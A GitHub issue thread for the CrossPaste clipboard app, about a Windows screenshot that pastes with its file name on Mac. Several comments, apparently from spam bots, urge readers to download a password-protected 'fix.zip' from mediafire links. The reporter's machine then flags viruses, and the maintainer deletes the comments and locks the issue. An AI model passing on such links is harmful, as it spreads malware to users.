### ISSUE TITLE
Take a screenshot on Windows and paste it on Mac, which will also paste the name of the image

### ISSUE THREAD

**Issue by qpf521** [CrossPaste/crosspaste-desktop#1736]
### How frequently does the bug occur?

Always

### Description

Take a screenshot on Windows and paste it on Mac, which will also paste the name of the image
<img width="1067" alt="image" src="https://github.com/user-attachments/assets/cbb772b7-691a-4371-b94f-e2454df9e95a">

### Can you reproduce the bug?

Always

### Version

1.0.7

### OS

macOS15，Windows10

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qpf521** [comment]
Why does the browser prompt for a virus？And the internet speed is very slow, I can't download it, so I also turned on a VPN
<img width="1206" alt="image" src="https://github.com/user-attachments/assets/13a9d051-654b-4968-b662-6c7ee261c8b0">

**Comment by guiyanakuang** [comment]
This is an open-source and free project, so I haven't purchased a Microsoft code signing certificate (which costs $4-5k per year). Therefore, it's normal for antivirus software to give warnings and for browsers to show pop-ups. However, there's good news: you can download it from the Microsoft Store, where Microsoft will automatically sign it, eliminating this issue.

**https://www.microsoft.com/store/apps/9P6X7D7DMCCR**

**Comment by guiyanakuang** [comment]
If the download is not smooth, a switch button will pop up. You can choose the Alibaba Cloud channel.
<img width="587" alt="image" src="https://github.com/user-attachments/assets/35d3f37c-80eb-4b94-a4a2-6f156bbe0b14">

**Comment by qpf521** [comment]
1. I am a Mac computer and cannot download your Microsoft Store applications. Just now I downloaded the link provided by a netizen, and it prompted that there is a large amount of virus, which is emitted by the browser. I don't know why this happened.
2. What I just said about not being able to download is not downloading your application, but downloading the "application" provided by netizens. Your application can always be downloaded normally.
3. The issue I would like to provide feedback on is that when taking a screenshot on Windows and then pasting it on Mac, the file name will appear. I think this is a bug, so I came to ask.

**Comment by guiyanakuang** [comment]
@qpf521  In fact, CrossPaste sets all content to the pasteboard. The extraction of content depends on the target software. You can try pasting into QQ and WeChat. QQ won't display the file name, so this is not a bug. I think a good solution would be to provide a new shortcut key that [only sets the main type of content to the pasteboard].
<img width="294" alt="image" src="https://github.com/user-attachments/assets/123ce4ce-573f-400d-bfdb-c4857d83a1fb">
<img width="372" alt="image" src="https://github.com/user-attachments/assets/c816c904-67e3-42e5-aedb-da6f0637a5b2">

**Comment by guiyanakuang** [comment]
> 1. I am a Mac computer and cannot download your Microsoft Store applications. Just now I downloaded the link provided by a netizen, and it prompted that there is a large amount of virus, which is emitted by the browser. I don't know why this happened.
> 2. What I just said about not being able to download is not downloading your application, but downloading the "application" provided by netizens. Your application can always be downloaded normally.
> 3. The issue I would like to provide feedback on is that when taking a screenshot on Windows and then pasting it on Mac, the file name will appear. I think this is a bug, so I came to ask.

I have deleted that person's comment. It was completely unrelated to the topic of this issue and looked like a bot commenting everywhere to promote some of their software. I can't be certain whether it contains a virus or not, but ignoring it is probably the best choice.

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qpf521** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Hello, after downloading the content of this website, my computer keeps reporting a virus. What is the reason for this？

**Comment by qpf521** [comment]
> > 1. I am a Mac computer and cannot download your Microsoft Store applications. Just now I downloaded the link provided by a netizen, and it prompted that there is a large amount of virus, which is emitted by the browser. I don't know why this happened.
> > 2. What I just said about not being able to download is not downloading your application, but downloading the "application" provided by netizens. Your application can always be downloaded normally.
> > 3. The issue I would like to provide feedback on is that when taking a screenshot on Windows and then pasting it on Mac, the file name will appear. I think this is a bug, so I came to ask.
> 
> I have deleted that person's comment. It was completely unrelated to the topic of this issue and looked like a bot commenting everywhere to promote some of their software. I can't be certain whether it contains a virus or not, but ignoring it is probably the best choice.
> 
> **Update**
> 
> @qpf521, To avoid misleading others (one of the main purposes of an issue is to help people with similar problems find answers), I will delete the comments about antivirus software screenshots. Let's focus on discussing the problem related to this issue.

Yes, you can delete their comments. But my computer is constantly reporting a virus, and I am trying to find a way to deal with it.

**Comment by qpf521** [comment]
Okay, thank you. I don't know if GitHub has such a feature, but it would be even better if it could be set to only post and author comments.

**Comment by guiyanakuang** [comment]
Temporarily lock the issue to prevent new bot comments.

**Comment by guiyanakuang** [comment]
@qpf521 

- [x] #1751

In the next version, could you support a shortcut key(⇧ + ⌘ + P) that only pastes the primary pasteboard data type? This can prevent target software from reading multiple types of data.
